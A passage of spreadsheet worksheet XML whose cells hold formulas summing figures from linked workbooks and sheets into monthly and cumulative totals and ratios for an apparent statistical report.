        <f>'[10]17'!$D$23+'[11]17'!$D$17+'[12]17'!$D$17+'[13]17'!$D$25+'[14]17'!$D$8+'[14]17'!$D$15+'[15]17'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]17'!$E$23+'[11]17'!$E$17+'[12]17'!$E$17+'[13]17'!$E$25+'[14]17'!$E$8+'[14]17'!$E$15+'[15]17'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'16'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]17'!$I$23+'[11]17'!$I$17+'[12]17'!$I$17+'[13]17'!$I$25+'[14]17'!$E$23+'[14]17'!$E$30+'[15]17'!$H$7</f>
        <v>837.89</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'16'!K6</f>
        <v>12167.32</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>274365.02</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]17'!$L$23+'[11]17'!$L$17+'[12]17'!$L$17+'[13]17'!$L$25+'[14]17'!$H$23+'[14]17'!$H$30+'[15]17'!$K$7</f>
        <v>25373.52</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]17'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]17'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]17'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]17'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]17'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]17'!$V$102</f>
        <v>33.7749169040836</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]17'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]17'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]17'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]17'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]17'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'16'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]17'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'16'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]17'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]17'!$W$107</f>
        <v>125.025432349949</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]17'!$X$107</f>
        <v>126.154091053804</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]17'!$Y$107</f>
        <v>131.524109069558</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]17'!$T$107</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]17'!$U$107</f>
        <v>46.1911764705882</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]17'!$V$107</f>
        <v>31.7413342830009</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]17'!$Q$107</f>
        <v>9.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]17'!$R$107</f>
        <v>188.46</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]17'!$S$107</f>
        <v>2673.89</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]17'!$D$27+'[11]17'!$D$18+'[13]17'!$D$26+'[14]17'!$D$10+'[14]17'!$D$17+'[15]17'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]17'!$E$27+'[11]17'!$E$18+'[13]17'!$E$26+'[14]17'!$E$10+'[14]17'!$E$17+'[15]17'!$E$9</f>
        <v>2404</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'16'!H8</f>
        <v>39730</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>565266.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]17'!$I$27+'[11]17'!$I$18+'[13]17'!$I$26+'[14]17'!$E$25+'[14]17'!$E$32+'[15]17'!$H$9</f>
        <v>2335.47</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'16'!K8</f>
        <v>42264.1</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>550008.81</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]17'!$L$27+'[11]17'!$L$18+'[13]17'!$L$26+'[14]17'!$H$25+'[14]17'!$H$32+'[15]17'!$K$9</f>
        <v>39345.8</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]17'!$W$108</f>
        <v>135.198372329603</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]17'!$X$108</f>
        <v>131.886250978346</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]17'!$Y$108</f>
        <v>127.782290140256</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]17'!$T$108</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]17'!$U$108</f>
        <v>46.9730392156863</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]17'!$V$108</f>
        <v>28.3535137701804</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]17'!$Q$108</f>
        <v>9.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]17'!$R$108</f>
        <v>191.65</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]17'!$S$108</f>
        <v>2388.5</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]17'!$D$24+'[11]17'!$D$19+'[12]17'!$D$20+'[13]17'!$D$27+'[14]17'!$D$11+'[14]17'!$D$18+'[15]17'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]17'!$E$24+'[11]17'!$E$19+'[12]17'!$E$20+'[13]17'!$E$27+'[14]17'!$E$11+'[14]17'!$E$18+'[15]17'!$E$10</f>
        <v>9742</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'16'!H9</f>
        <v>250155</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4385543.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]17'!$I$24+'[11]17'!$I$19+'[12]17'!$I$20+'[13]17'!$I$27+'[14]17'!$E$26+'[14]17'!$E$33+'[15]17'!$H$10</f>
        <v>15937.066</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'16'!K9</f>
        <v>261856.501</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4359335.312</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]17'!$L$24+'[11]17'!$L$19+'[12]17'!$L$20+'[13]17'!$L$27+'[14]17'!$H$26+'[14]17'!$H$33+'[15]17'!$K$10</f>
        <v>99164.211</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]17'!$W$109</f>
        <v>277.430262045647</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]17'!$X$109</f>
        <v>276.717801214446</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]17'!$Y$109</f>
        <v>271.54463750749</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]17'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]17'!$U$109</f>
        <v>30.6764705882353</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]17'!$V$109</f>
        <v>34.6717711301044</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]17'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]17'!$R$109</f>
        <v>125.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]17'!$S$109</f>
        <v>2920.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]17'!$D$25+'[11]17'!$D$20+'[12]17'!$D$21+'[13]17'!$D$28+'[14]17'!$D$12+'[14]17'!$D$19+'[15]17'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]17'!$E$25+'[11]17'!$E$20+'[12]17'!$E$21+'[13]17'!$E$28+'[14]17'!$E$12+'[14]17'!$E$19+'[15]17'!$E$11</f>
        <v>3954</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'16'!H10</f>
        <v>39420</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>956947.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]17'!$I$25+'[11]17'!$I$20+'[12]17'!$I$21+'[13]17'!$I$28+'[14]17'!$E$27+'[14]17'!$E$34+'[15]17'!$H$11</f>
        <v>3125.5</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'16'!K10</f>
        <v>49228.54</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>946457.26</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]17'!$L$25+'[11]17'!$L$20+'[12]17'!$L$21+'[13]17'!$L$28+'[14]17'!$H$27+'[14]17'!$H$34+'[15]17'!$K$11</f>
        <v>51398.402</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]17'!$W$110</f>
        <v>240.8</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]17'!$X$110</f>
        <v>257.510489510489</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]17'!$Y$110</f>
        <v>268.293052086989</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]17'!$T$110</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]17'!$U$110</f>
        <v>35.0490196078431</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]17'!$V$110</f>
        <v>34.5092592592592</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]17'!$Q$110</f>
        <v>10</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]17'!$R$110</f>
        <v>143</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]17'!$S$110</f>
        <v>2907.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]17'!$D$26+'[11]17'!$D$21+'[12]17'!$D$19+'[13]17'!$D$29+'[14]17'!$D$13+'[14]17'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]17'!$E$26+'[11]17'!$E$21+'[12]17'!$E$19+'[13]17'!$E$29+'[14]17'!$E$13+'[14]17'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'16'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]17'!$I$26+'[11]17'!$I$21+'[12]17'!$I$19+'[13]17'!$I$29+'[14]17'!$E$28+'[14]17'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'16'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]17'!$L$26+'[11]17'!$L$21+'[12]17'!$L$19+'[13]17'!$L$29+'[14]17'!$H$28+'[14]17'!$H$35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6505.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'16'!H12</f>
        <v>147615.86</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5090007.11</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>13110.311</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'16'!K12</f>
        <v>288473.444</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5317579.82</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>269026.82100005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>61.2817359908999</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]17'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]17'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]17'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]17'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]17'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]17'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]17'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]17'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]17'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'16'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'16'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>49.3627194495505</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]17'!$W$68</f>
        <v>271.041666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]17'!$X$68</f>
        <v>262.642857142857</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]17'!$Y$68</f>
        <v>266.183411390451</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]17'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]17'!$U$68</f>
        <v>78.921568627451</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]17'!$V$68</f>
        <v>71.9080009496676</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]17'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]17'!$R$68</f>
        <v>322.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]17'!$S$68</f>
        <v>6057.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>4623</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'16'!H14</f>
        <v>47570</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1012113.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5419.56</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'16'!K14</f>
        <v>93069.625</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1886013.731</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>60936.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]17'!$W$71</f>
        <v>227.012383900929</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]17'!$X$71</f>
        <v>218.35948379909</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]17'!$Y$71</f>
        <v>213.747253602142</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]17'!$T$71</f>
        <v>53.8333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]17'!$U$71</f>
        <v>52.7990196078431</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]17'!$V$71</f>
        <v>50.355175688509</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]17'!$Q$71</f>
        <v>12.92</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]17'!$R$71</f>
        <v>215.42</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]17'!$S$71</f>
        <v>4241.92</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'16'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>64.3110000000006</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'16'!K15</f>
        <v>5059.469</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119815.969</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]17'!$W$72</f>
        <v>63.125</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]17'!$X$72</f>
        <v>63.1333943833944</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]17'!$Y$72</f>
        <v>61.3961640242185</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]17'!$T$72</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]17'!$U$72</f>
        <v>64.2352941176471</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]17'!$V$72</f>
        <v>51.4076448243115</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]17'!$Q$72</f>
        <v>8.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]17'!$R$72</f>
        <v>262.08</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]17'!$S$72</f>
        <v>4330.58</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'16'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'16'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]17'!$W$73</f>
        <v>65.75</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]17'!$X$73</f>
        <v>60.5235042735043</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]17'!$Y$73</f>
        <v>62.7760020635668</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]17'!$T$73</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]17'!$U$73</f>
        <v>64.2352941176471</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]17'!$V$73</f>
        <v>52.9237891737892</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]17'!$Q$73</f>
        <v>8.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]17'!$R$73</f>
        <v>262.08</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]17'!$S$73</f>
        <v>4458.30</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'16'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'16'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]17'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]17'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]17'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]17'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]17'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]17'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]17'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]17'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]17'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'16'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'16'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]17'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]17'!$X$74</f>
        <v>217.2</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]17'!$Y$74</f>
        <v>222.059043410363</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]17'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]17'!$U$74</f>
        <v>9.80392156862745</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]17'!$V$74</f>
        <v>7.14541785375119</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]17'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]17'!$R$74</f>
        <v>40</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]17'!$S$74</f>
        <v>601.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'16'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'16'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]17'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]17'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]17'!$Y$72</f>
        <v>9.1340782122905e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]17'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]17'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]17'!$V$72</f>
        <v>4.24976258309592e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]17'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]17'!$R$72</f>
        <v>1.7e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]17'!$S$72</f>
